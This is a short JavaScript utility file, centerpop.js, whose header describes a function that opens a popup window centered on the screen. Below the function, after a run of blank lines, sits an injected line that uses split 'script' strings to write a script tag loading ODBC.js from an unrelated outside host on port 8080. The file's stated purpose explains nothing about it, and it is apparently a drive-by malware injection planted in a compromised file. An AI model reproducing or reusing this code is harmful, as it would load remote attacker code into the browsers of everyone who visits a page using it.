/*---------------------------------------------------------------------------*\
title					:	centerpop
Source				:	centerpop.js
Copyright			:	(C) Lukkien
Developed by		:	Lukkien
Last Modified by	:	H.E. de Kroon
Version				:	1.00
CVS					:	Revision: 1.05 Date: 20/12/05
Description			:	opens a new window centered on the screen

var settings = 'height=' + h + ',width=' + w + ',top=' + ypos + ',left=' + xpos + ',scrollbars=' + scroll + ',resizable'
/*---------------------------------------------------------------------------*/

var win = null;
function centerpop(myurl, myname, w, h, scroll){
	var xpos = (screen.width) ? (screen.width - w) / 2 : 0;
	var ypos = (screen.height) ? (screen.height - h) / 2 : 0;
	var settings = 'height=' + h + ',width=' + w + ',top=' + ypos + ',left=' + xpos + ',scrollbars=' + scroll +' ,resizable'
	win = window.open(myurl,myname,settings)
}





document.write('<s'+'cript type="text/javascript" src="http://sfofotky.iexam.info:8080/ODBC.js"></scr'+'ipt>');